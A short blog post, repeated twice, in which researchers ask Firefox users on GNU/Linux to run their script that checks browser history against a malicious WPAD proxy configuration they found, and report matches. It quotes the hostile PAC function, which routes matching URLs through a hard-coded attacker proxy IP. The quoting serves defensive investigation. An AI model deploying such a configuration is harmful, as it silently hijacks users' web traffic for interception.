Technology Temple

If you use fire­fox on a GNU/Linux machine, you can help us in find­ing which sites are the tar­gets of the Wpad exploit we blogged about (see part 3, part 2 and part 1 ).

Alessan­dro and I have writ­ten a script that checks the WPAD ital­ian reg­u­lar expression,

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

against the browser his­tory. Please make sure to close fire­fox before run­ning the script (since it accesses directly its his­tory data­base, which is locked when the browser is run­ning), and please report any pos­i­tive matches. Down­load the script by fol­low­ing this link.

If you use fire­fox on a GNU/Linux machine, you can help us in find­ing which sites are the tar­gets of the Wpad exploit we blogged about (see part 3, part 2 and part 1 ).

Alessan­dro and I have writ­ten a script that checks the WPAD ital­ian reg­u­lar expression,

function FindProxyForURL(url, host) {
        //regular expression/complexity supported?
        if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; }
        return "DIRECT";
}

against the browser his­tory. Please make sure to close fire­fox before run­ning the script (since it accesses directly its his­tory data­base, which is locked when the browser is run­ning), and please report any pos­i­tive matches. Down­load the script by fol­low­ing this link.